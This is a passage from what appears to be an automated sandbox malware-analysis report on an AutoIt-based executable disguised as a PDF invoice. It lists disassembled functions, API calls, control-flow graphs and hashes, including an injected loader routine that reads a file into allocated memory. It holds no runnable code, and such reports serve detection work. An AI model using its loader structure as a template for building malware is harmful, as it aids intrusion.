                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00760FDF
                                                                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 0076105A
                                                                                                                      • DestroyWindow.USER32 ref: 00761066
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00761080
                                                                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 007952AD
                                                                                                                      • TranslateMessage.USER32(?), ref: 0079608A
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00796098
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007960AC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                                                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                      • API String ID: 4003667617-3242690629
                                                                                                                      • Opcode ID: 2c957172e265d83ae76736de36a29cc4b8e78fb35d34c4c118a04387e4921e0a
                                                                                                                      • Instruction ID: 2d7f54c0d3614b7ea82c6189de1d7f19eeb9ee85f36e7085de8cc825c9c4182d
                                                                                                                      • Opcode Fuzzy Hash: 2c957172e265d83ae76736de36a29cc4b8e78fb35d34c4c118a04387e4921e0a
                                                                                                                      • Instruction Fuzzy Hash: 51B20670608751DFDB25DF24D888BAAB7E5FF84304F14891DF98A87291DB79E844CB82
                                                                                                                      Function 007B93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007B91E9: __time64.LIBCMT ref: 007B91F3
                                                                                                                        • Part of subcall function 00755045: _fseek.LIBCMT ref: 0075505D
                                                                                                                      • __wsplitpath.LIBCMT ref: 007B94BE
                                                                                                                        • Part of subcall function 0077432E: __wsplitpath_helper.LIBCMT ref: 0077436E
                                                                                                                      • _wcscpy.LIBCMT ref: 007B94D1
                                                                                                                      • _wcscat.LIBCMT ref: 007B94E4
                                                                                                                      • __wsplitpath.LIBCMT ref: 007B9509
                                                                                                                      • _wcscat.LIBCMT ref: 007B951F
                                                                                                                      • _wcscat.LIBCMT ref: 007B9532
                                                                                                                        • Part of subcall function 007B922F: _memmove.LIBCMT ref: 007B9268
                                                                                                                        • Part of subcall function 007B922F: _memmove.LIBCMT ref: 007B9277
                                                                                                                      • _wcscmp.LIBCMT ref: 007B9479
                                                                                                                        • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AAE
                                                                                                                        • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AC1
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B96DC
                                                                                                                      • _wcsncpy.LIBCMT ref: 007B974F
                                                                                                                      • DeleteFileW.KERNEL32(?,?), ref: 007B9785
                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007B979B
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B97AC
                                                                                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B97BE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1500180987-0
                                                                                                                      • Opcode ID: 1d628bc5ebb5344dfa056722776207f033123286d73fc7ff38a13e09cb1b7307
                                                                                                                      • Instruction ID: aa2e35405f704edf1e7b88826b231be6d2511a799ed9199bb0de428c1af414e4
                                                                                                                      • Opcode Fuzzy Hash: 1d628bc5ebb5344dfa056722776207f033123286d73fc7ff38a13e09cb1b7307
                                                                                                                      • Instruction Fuzzy Hash: DFC13CB1E00219AADF21DFA4CC85ADEB7BDEF45300F0040AAF619E7151DB789A448F65
                                                                                                                      Function 00753015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 75windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: 4f68569a94d2c6e9cdf9bb30b28d542010efe9f9d35d367098e30029dfa57f96
                                                                                                                      • Instruction ID: 9403641a300c7b2919ae543170a4ea8879335217ee0becef041cf6f4f941b8d0
                                                                                                                      • Opcode Fuzzy Hash: 4f68569a94d2c6e9cdf9bb30b28d542010efe9f9d35d367098e30029dfa57f96
                                                                                                                      • Instruction Fuzzy Hash: EB3129B1901349AFDB008FA4EC48AD9BBF4FF09320F14816AE591E62A0E3B94551CF95
                                                                                                                      Function 00753041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: a5e8fd3a0534e81f5f29b6a997f6656bdd9aace13f89737145fc1204794f890f
                                                                                                                      • Instruction ID: 5e260e16bad78f3683d5be7ba9731e6fe021295f60e3800123c13f7a12cde20f
                                                                                                                      • Opcode Fuzzy Hash: a5e8fd3a0534e81f5f29b6a997f6656bdd9aace13f89737145fc1204794f890f
                                                                                                                      • Instruction Fuzzy Hash: 6421C5B1912218AFDB00DFA4EC49BDDBBF8FB08710F00812AF952A62A0E7B545548F95
                                                                                                                      Function 007571EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00754864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008162F8,?,007537C0,?), ref: 00754882
                                                                                                                        • Part of subcall function 0077074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007572C5), ref: 00770771
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00757308
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0078ECF1
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0078ED32
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0078ED70
                                                                                                                      • _wcscat.LIBCMT ref: 0078EDC9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                      • API String ID: 2673923337-2727554177
                                                                                                                      • Opcode ID: 40e6fe5273bd0450850498273303f6476fd7661f69441c7ece79be72461ebb3b
                                                                                                                      • Instruction ID: 005faae5879a0ccc0939fd1aa292cd127e60744b8fa11cf52c8af542e102e27c
                                                                                                                      • Opcode Fuzzy Hash: 40e6fe5273bd0450850498273303f6476fd7661f69441c7ece79be72461ebb3b
                                                                                                                      • Instruction Fuzzy Hash: F8714C71509301DEC714EF25EC8589BBBFCFF58350B40852EF846831A1EBB8994ACBA1
                                                                                                                      Function 00753633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 761 753633-753681 763 7536e1-7536e3 761->763 764 753683-753686 761->764 763->764 767 7536e5 763->767 765 7536e7 764->765 766 753688-75368f 764->766 769 78d31c-78d34a call 7611d0 call 7611f3 765->769 770 7536ed-7536f0 765->770 771 753695-75369a 766->771 772 75375d-753765 PostQuitMessage 766->772 768 7536ca-7536d2 DefWindowProcW 767->768 778 7536d8-7536de 768->778 808 78d34f-78d356 769->808 773 753715-75373c SetTimer RegisterWindowMessageW 770->773 774 7536f2-7536f3 770->774 775 7536a0-7536a2 771->775 776 78d38f-78d3a3 call 7b2a16 771->776 779 753711-753713 772->779 773->779 782 75373e-753749 CreatePopupMenu 773->782 780 78d2bf-78d2c2 774->780 781 7536f9-75370c KillTimer call 7544cb call 753114 774->781 783 753767-753776 call 754531 775->783 784 7536a8-7536ad 775->784 776->779 802 78d3a9 776->802 779->778 787 78d2f8-78d317 MoveWindow 780->787 788 78d2c4-78d2c6 780->788 781->779 782->779 783->779 790 7536b3-7536b8 784->790 791 78d374-78d37b 784->791 787->779 796 78d2c8-78d2cb 788->796 797 78d2e7-78d2f3 SetFocus 788->797 800 7536be-7536c4 790->800 801 75374b-75375b call 7545df 790->801 791->768 799 78d381-78d38a call 7a817e 791->799 796->800 804 78d2d1-78d2e2 call 7611d0 796->804 797->779 799->768 800->768 800->808 801->779 802->768 804->779 808->768 809 78d35c-78d36f call 7544cb call 7543db 808->809 809->768
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 007536D2
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 007536FC
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0075371F
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0075372A
                                                                                                                      • CreatePopupMenu.USER32 ref: 0075373E
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0075375F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                      • String ID: TaskbarCreated$%~
                                                                                                                      • API String ID: 129472671-4286669069
                                                                                                                      • Opcode ID: 9497ad97297347907eb35678bf9d9cf50dfdd8f71bb87b5be5dc7c357a071c56
                                                                                                                      • Instruction ID: fd0cfb8dceadd1170e529cfd9a7ede81d4b803943a5ea9191186ba7dcac20184
                                                                                                                      • Opcode Fuzzy Hash: 9497ad97297347907eb35678bf9d9cf50dfdd8f71bb87b5be5dc7c357a071c56
                                                                                                                      • Instruction Fuzzy Hash: DB4129B1600109EBDB246B64DC4DBF93768FB04382F04452DFD42D22B1EAEC9E689365
                                                                                                                      Function 00753A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00753A62
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00753A71
                                                                                                                      • LoadIconW.USER32(00000063), ref: 00753A88
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00753A9A
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00753AAC
                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AD2
                                                                                                                      • RegisterClassExW.USER32(?), ref: 00753B28
                                                                                                                        • Part of subcall function 00753041: GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                                        • Part of subcall function 00753041: RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                                        • Part of subcall function 00753041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                                        • Part of subcall function 00753041: InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                                        • Part of subcall function 00753041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                                        • Part of subcall function 00753041: LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                                        • Part of subcall function 00753041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                      • Opcode ID: 6832bf939f15d1375eeed808a9c124af93e4932c9b4466404dfb7148411e66c6
                                                                                                                      • Instruction ID: b4df5ccc9396759435564d75dbc4a76c226749bcc5c70d11a0387f1fbf881879
                                                                                                                      • Opcode Fuzzy Hash: 6832bf939f15d1375eeed808a9c124af93e4932c9b4466404dfb7148411e66c6
                                                                                                                      • Instruction Fuzzy Hash: 59212E71D41304AFEB109FA4EC09BDD7BB9FF08721F00812AF544A62A0E3B95664CF54
                                                                                                                      Function 00753778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                      • API String ID: 1825951767-3513169116
                                                                                                                      • Opcode ID: 52bdfa86cf4396406757f882574dfa994383b771ba63399d56cb558485d61f14
                                                                                                                      • Instruction ID: 1ed4f583484687dd6ec54dd0508a2fc96599742552a223528e666c62dc3c5a2d
                                                                                                                      • Opcode Fuzzy Hash: 52bdfa86cf4396406757f882574dfa994383b771ba63399d56cb558485d61f14
                                                                                                                      • Instruction Fuzzy Hash: 78A13E71D1022DDACB04EBA0CC9ADEEB778BF14341F444529E916B7191EFB96A0DCB60
                                                                                                                      Function 018D2620 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 953 18d2620-18d26ce call 18d0000 956 18d26d5-18d26fb call 18d3530 CreateFileW 953->956 959 18d26fd 956->959 960 18d2702-18d2712 956->960 961 18d284d-18d2851 959->961 965 18d2719-18d2733 VirtualAlloc 960->965 966 18d2714 960->966 963 18d2893-18d2896 961->963 964 18d2853-18d2857 961->964 967 18d2899-18d28a0 963->967 968 18d2859-18d285c 964->968 969 18d2863-18d2867 964->969 972 18d273a-18d2751 ReadFile 965->972 973 18d2735 965->973 966->961 974 18d28f5-18d290a 967->974 975 18d28a2-18d28ad 967->975 968->969 970 18d2869-18d2873 969->970 971 18d2877-18d287b 969->971 970->971 978 18d287d-18d2887 971->978 979 18d288b 971->979 980 18d2758-18d2798 VirtualAlloc 972->980 981 18d2753 972->981 973->961 976 18d290c-18d2917 VirtualFree 974->976 977 18d291a-18d2922 974->977 982 18d28af 975->982 983 18d28b1-18d28bd 975->983 976->977 978->979 979->963 984 18d279f-18d27ba call 18d3780 980->984 985 18d279a 980->985 981->961 982->974 986 18d28bf-18d28cf 983->986 987 18d28d1-18d28dd 983->987 993 18d27c5-18d27cf 984->993 985->961 989 18d28f3 986->989 990 18d28df-18d28e8 987->990 991 18d28ea-18d28f0 987->991 989->967 990->989 991->989 994 18d27d1-18d2800 call 18d3780 993->994 995 18d2802-18d2816 call 18d3590 993->995 994->993 1001 18d2818 995->1001 1002 18d281a-18d281e 995->1002 1001->961 1003 18d282a-18d282e 1002->1003 1004 18d2820-18d2824 CloseHandle 1002->1004 1005 18d283e-18d2847 1003->1005 1006 18d2830-18d283b VirtualFree 1003->1006 1004->1003 1005->956 1005->961 1006->1005
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018D26F1
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018D2917
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                      • Instruction ID: ac9c19e84ca85c8b817de517c804f279efc3080ba5688020599888cb49991831
                                                                                                                      • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                                      • Instruction Fuzzy Hash: 58A10774E00309EBDB14CFA8C895BEEBBB6BF48305F208159E511BB281D7759A81CB95
                                                                                                                      Function 007539E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1074 7539e7-753a57 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A15
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A36
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00753A4A
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00753A53
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: 83180fe927729d2129d5fb5a4eb14bdd8c8d570c6ac7e6d33ffe8299f7d65ab2
                                                                                                                      • Instruction ID: 7d533b84a6f6290bf85d85d2401eb5124ac854660e556e1b783989b08593f151
                                                                                                                      • Opcode Fuzzy Hash: 83180fe927729d2129d5fb5a4eb14bdd8c8d570c6ac7e6d33ffe8299f7d65ab2
                                                                                                                      • Instruction Fuzzy Hash: D5F03A706012907EEA3017236C08FA72F7DEBC6F60B01802AF900E2270D2B91821CAB0
                                                                                                                      Function 018D23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1075 18d23b0-18d2517 call 18d0000 call 18d22a0 CreateFileW 1082 18d251e-18d252e 1075->1082 1083 18d2519 1075->1083 1086 18d2535-18d254f VirtualAlloc 1082->1086 1087 18d2530 1082->1087 1084 18d25ce-18d25d3 1083->1084 1088 18d2551 1086->1088 1089 18d2553-18d256a ReadFile 1086->1089 1087->1084 1088->1084 1090 18d256c 1089->1090 1091 18d256e-18d25a8 call 18d22e0 call 18d12a0 1089->1091 1090->1084 1096 18d25aa-18d25bf call 18d2330 1091->1096 1097 18d25c4-18d25cc ExitProcess 1091->1097 1096->1097 1097->1084
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 018D22A0: Sleep.KERNELBASE(000001F4), ref: 018D22B1
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018D250D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
